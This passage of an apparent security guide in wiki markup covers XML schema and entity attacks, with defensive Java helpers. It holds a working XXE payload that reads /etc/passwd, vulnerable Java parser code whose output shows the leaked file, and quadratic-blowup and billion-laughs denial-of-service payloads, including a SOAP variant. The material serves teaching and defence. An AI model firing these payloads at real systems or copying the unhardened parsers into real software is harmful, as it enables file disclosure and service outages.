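With this configuration, the embedded-schema example above would be expected to be rejected, while the same &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; document without a DOCTYPE would still parse. Applications that genuinely need DTDs cannot use this setting and need other restrictions.&lt;br /&gt;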
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
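&lt;br /&gt;
A deployment check can flag this condition before the schema is used. The sketch below assumes a POSIX filesystem; &amp;lt;tt&amp;gt;SchemaPermissionCheck&amp;lt;/tt&amp;gt; is a hypothetical helper, not part of any library:&lt;br /&gt;

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.attribute.PosixFilePermission;

// Hypothetical helper: detects schema files that any local user may modify.
final class SchemaPermissionCheck {

    // True when "others" may write to the file, as in the rw-rw-rw- listing.
    // Assumes a POSIX filesystem; other filesystems raise UnsupportedOperationException.
    static boolean isWorldWritable(Path schema) throws IOException {
        return Files.getPosixFilePermissions(schema)
                    .contains(PosixFilePermission.OTHERS_WRITE);
    }
}
```

For the listing above, &amp;lt;tt&amp;gt;isWorldWritable&amp;lt;/tt&amp;gt; would return true, since the last permission group is &amp;lt;tt&amp;gt;rw-&amp;lt;/tt&amp;gt;.&lt;br /&gt;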
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When XML documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker on the network path could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted over unencrypted HTTP. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
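&lt;br /&gt;
A simple pre-check can flag schema locations that would travel in plain text. This is only a sketch: &amp;lt;tt&amp;gt;SchemaLocationCheck&amp;lt;/tt&amp;gt; is a hypothetical helper, and it assumes the system identifier has already been extracted from the document:&lt;br /&gt;

```java
import java.net.URI;

// Hypothetical helper: flags schema locations fetched without transport encryption.
final class SchemaLocationCheck {

    // True when the system identifier would be fetched over plain-text HTTP.
    static boolean usesPlainHttp(String systemId) {
        String scheme = URI.create(systemId).getScheme();
        // getScheme() is null for relative identifiers such as "note.dtd".
        return "http".equalsIgnoreCase(scheme);
    }
}
```

Here the identifier from the example above would be flagged, whereas a relative identifier such as &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; has no scheme and would not.&lt;br /&gt;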
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an Internet Protocol (IP) address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own IP addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
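&lt;br /&gt;
One possible safeguard, sketched here under the assumption that a known-good digest of the schema was recorded in advance, is to compare the retrieved schema against that pinned value before using it. &amp;lt;tt&amp;gt;SchemaPin&amp;lt;/tt&amp;gt; and its methods are hypothetical names:&lt;br /&gt;

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.Locale;

// Hypothetical helper: compares a retrieved schema with a digest pinned in advance.
final class SchemaPin {

    // Lowercase hexadecimal SHA-256 digest of the schema bytes.
    static String sha256Hex(byte[] content) {
        try {
            byte[] digest = MessageDigest.getInstance("SHA-256").digest(content);
            StringBuilder hex = new StringBuilder();
            for (byte b : digest) {
                hex.append(String.format("%02x", b));
            }
            return hex.toString();
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("SHA-256 is unavailable", e);
        }
    }

    // True when the content matches the pinned digest (hex, case-insensitive).
    static boolean matchesPin(byte[] content, String pinnedHex) {
        return MessageDigest.isEqual(
            sha256Hex(content).getBytes(StandardCharsets.US_ASCII),
            pinnedHex.toLowerCase(Locale.ROOT).getBytes(StandardCharsets.US_ASCII));
    }
}
```

A schema whose digest differs from the pinned value would then be discarded instead of being handed to the parser. The trade-off is that legitimate schema updates also require updating the pin.&lt;br /&gt;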
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Sample Vulnerable Java Implementations === &lt;br /&gt;
Using the DTD capability of referencing local or remote files, it is possible to affect confidentiality. It is also possible to affect the availability of resources if no proper restrictions have been set on entity expansion. Consider the following example of an XML External Entity (XXE) attack.&lt;br /&gt;
&lt;br /&gt;
'''Sample XML'''&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt; &lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/lastname&amp;gt;&lt;br /&gt;
  &amp;lt;/contact&amp;gt; &lt;br /&gt;
 &amp;lt;/contacts&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Sample DTD'''&lt;br /&gt;
 &amp;lt;!ELEMENT contacts (contact*)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT contact (firstname,lastname)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT firstname (#PCDATA)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT lastname ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY xxe SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== XXE using DOM ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilder;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilderFactory;&lt;br /&gt;
 import javax.xml.parsers.ParserConfigurationException;&lt;br /&gt;
 import org.xml.sax.InputSource;&lt;br /&gt;
 import org.w3c.dom.Document;&lt;br /&gt;
 import org.w3c.dom.Element;&lt;br /&gt;
 import org.w3c.dom.Node;&lt;br /&gt;
 import org.w3c.dom.NodeList;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();&lt;br /&gt;
    DocumentBuilder builder = factory.newDocumentBuilder();&lt;br /&gt;
    Document doc = builder.parse(new InputSource(&amp;quot;contacts.xml&amp;quot;));&lt;br /&gt;
    NodeList nodeLst = doc.getElementsByTagName(&amp;quot;contact&amp;quot;);&lt;br /&gt;
    for (int s = 0; s &amp;lt; nodeLst.getLength(); s++) {&lt;br /&gt;
      Node fstNode = nodeLst.item(s);&lt;br /&gt;
      if (fstNode.getNodeType() == Node.ELEMENT_NODE) {&lt;br /&gt;
        Element fstElmnt = (Element) fstNode;&lt;br /&gt;
        NodeList fstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;firstname&amp;quot;);&lt;br /&gt;
        Element fstNmElmnt = (Element) fstNmElmntLst.item(0);&lt;br /&gt;
        NodeList fstNm = fstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;First Name: &amp;quot;  + ((Node) fstNm.item(0)).getNodeValue());&lt;br /&gt;
        NodeList lstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;lastname&amp;quot;);&lt;br /&gt;
        Element lstNmElmnt = (Element) lstNmElmntLst.item(0);&lt;br /&gt;
        NodeList lstNm = lstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;Last Name: &amp;quot; + ((Node) lstNm.item(0)).getNodeValue());&lt;br /&gt;
      }&lt;br /&gt;
     }&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
     e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ javac parseDocument.java ; java parseDocument&lt;br /&gt;
 First Name: John&lt;br /&gt;
 Last Name: '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using DOM4J ====&lt;br /&gt;
 import org.dom4j.Document;&lt;br /&gt;
 import org.dom4j.DocumentException;&lt;br /&gt;
 import org.dom4j.io.SAXReader;&lt;br /&gt;
 import org.dom4j.io.OutputFormat;&lt;br /&gt;
 import org.dom4j.io.XMLWriter;&lt;br /&gt;
&lt;br /&gt;
 public class test1 {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   Document document = null;&lt;br /&gt;
   try {&lt;br /&gt;
    SAXReader reader = new SAXReader();&lt;br /&gt;
    document = reader.read(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   } &lt;br /&gt;
   OutputFormat format = OutputFormat.createPrettyPrint();&lt;br /&gt;
   try {&lt;br /&gt;
    XMLWriter writer = new XMLWriter( System.out, format );&lt;br /&gt;
    writer.write( document );&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java test1&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt;&lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using SAX ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.SAXParser;&lt;br /&gt;
 import javax.xml.parsers.SAXParserFactory;&lt;br /&gt;
 import org.xml.sax.SAXException;&lt;br /&gt;
 import org.xml.sax.helpers.DefaultHandler;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument extends DefaultHandler {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   new parseDocument();&lt;br /&gt;
  }&lt;br /&gt;
  public parseDocument() {&lt;br /&gt;
   try {&lt;br /&gt;
    SAXParserFactory factory = SAXParserFactory.newInstance();&lt;br /&gt;
    SAXParser parser = factory.newSAXParser();&lt;br /&gt;
    parser.parse(&amp;quot;contacts.xml&amp;quot;, this);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
  @Override&lt;br /&gt;
  public void characters(char[] ac, int i, int j) throws SAXException {&lt;br /&gt;
   String tmpValue = new String(ac, i, j);&lt;br /&gt;
   System.out.println(tmpValue);&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 John&lt;br /&gt;
 '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using StAX ====&lt;br /&gt;
 import javax.xml.stream.XMLStreamReader;&lt;br /&gt;
 import javax.xml.stream.XMLInputFactory;&lt;br /&gt;
 import java.io.File;&lt;br /&gt;
 import java.io.FileInputStream;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    // No hardening is applied to the factory, so the DTD and its external entity are processed&lt;br /&gt;
    XMLInputFactory xmlif = XMLInputFactory.newInstance();&lt;br /&gt;
    File file = new File(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
    XMLStreamReader xmlfer = xmlif.createXMLStreamReader(&amp;quot;contacts.xml&amp;quot;, new FileInputStream(file));&lt;br /&gt;
    while (xmlfer.hasNext()) {&lt;br /&gt;
     xmlfer.next();&lt;br /&gt;
     // Print the text of every event that carries text, including the expanded entity&lt;br /&gt;
     if (xmlfer.hasText()) {&lt;br /&gt;
      System.out.print(xmlfer.getText());&lt;br /&gt;
     }&lt;br /&gt;
    }&lt;br /&gt;
    xmlfer.close();&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;'''John### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
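&lt;br /&gt;
For comparison, the StAX reader can be configured so that the same input is not expanded. This is a hedged sketch using the standard &amp;lt;tt&amp;gt;XMLInputFactory&amp;lt;/tt&amp;gt; properties &amp;lt;tt&amp;gt;SUPPORT_DTD&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;IS_SUPPORTING_EXTERNAL_ENTITIES&amp;lt;/tt&amp;gt;; the class &amp;lt;tt&amp;gt;HardenedStax&amp;lt;/tt&amp;gt; is a hypothetical name, and the exact failure mode for a document that still references &amp;lt;tt&amp;gt;&amp;amp;xxe;&amp;lt;/tt&amp;gt; depends on the StAX implementation in use:&lt;br /&gt;

```java
import java.io.StringReader;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

// Hypothetical helper: reads character data with DTD processing switched off.
final class HardenedStax {

    // Returns the concatenated character data of the document.
    // Input that relies on DTD-declared entities may raise XMLStreamException.
    static String readText(String xml) throws XMLStreamException {
        XMLInputFactory factory = XMLInputFactory.newInstance();
        // Standard StAX properties: do not process DTDs, never fetch external entities.
        factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        XMLStreamReader reader = factory.createXMLStreamReader(new StringReader(xml));
        StringBuilder text = new StringBuilder();
        while (reader.hasNext()) {
            if (reader.next() == XMLStreamReader.CHARACTERS) {
                text.append(reader.getText());
            }
        }
        reader.close();
        return text.toString();
    }
}
```

Unlike the vulnerable sample, this reader only collects character events, so the DOCTYPE text itself is not echoed either.&lt;br /&gt;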
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
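When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities. The well-formedness rules of the XML specification forbid such recursion, so a conforming parser is expected to reject the following document rather than expand it:&lt;br /&gt;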
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n&amp;lt;sup&amp;gt;2&amp;lt;/sup&amp;gt;)). The result of the following attack will be 100,000 * 100,000 = 10,000,000,000 characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
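&lt;br /&gt;
The arithmetic behind this estimate can be sketched as follows; &amp;lt;tt&amp;gt;QuadraticBlowupEstimate&amp;lt;/tt&amp;gt; is a hypothetical helper, and the figures are the ones from the example above:&lt;br /&gt;

```java
// Hypothetical helper: estimates the expanded size of a quadratic blowup document.
final class QuadraticBlowupEstimate {

    // Characters produced when one entity of entityLength characters
    // is referenced the given number of times in the document body.
    // multiplyExact raises ArithmeticException instead of silently overflowing.
    static long expandedCharacters(long entityLength, long references) {
        return Math.multiplyExact(entityLength, references);
    }
}
```

Calling &amp;lt;tt&amp;gt;expandedCharacters(100000, 100000)&amp;lt;/tt&amp;gt; yields 10,000,000,000, while the document itself only needs roughly 400,000 characters (the entity value plus 100,000 three-character references).&lt;br /&gt;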
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, the application will start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt; entities in its definition; then each of these will be resolved as 10 &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; entities, and so on. In the end, the CPU and/or memory will be affected by expanding 10^9 (1,000,000,000) copies of &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, about 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
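&lt;br /&gt;
Parsers can cap this kind of expansion. The sketch below assumes the JDK's bundled JAXP implementation, where enabling &amp;lt;tt&amp;gt;XMLConstants.FEATURE_SECURE_PROCESSING&amp;lt;/tt&amp;gt; applies implementation-defined limits on entity expansion; &amp;lt;tt&amp;gt;ExpansionLimitedParser&amp;lt;/tt&amp;gt; is a hypothetical name:&lt;br /&gt;

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;

// Hypothetical helper: parses with the JAXP secure-processing limits enabled.
final class ExpansionLimitedParser {

    // Returns true if the document parsed, false if the parser aborted.
    static boolean parses(String xml) {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            // Ask the implementation to enforce its processing limits
            // (the concrete entity expansion limits are implementation-defined).
            factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
            factory.newDocumentBuilder()
                   .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return true;
        } catch (Exception e) {
            return false;
        }
    }
}
```

Under that assumption, the document above is expected to be aborted with a parse error long before the full expansion is materialized. The concrete limits differ between JDK versions and parser implementations, so they should be checked for the platform in use.&lt;br /&gt;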
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser does not follow the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:Envelope [&lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
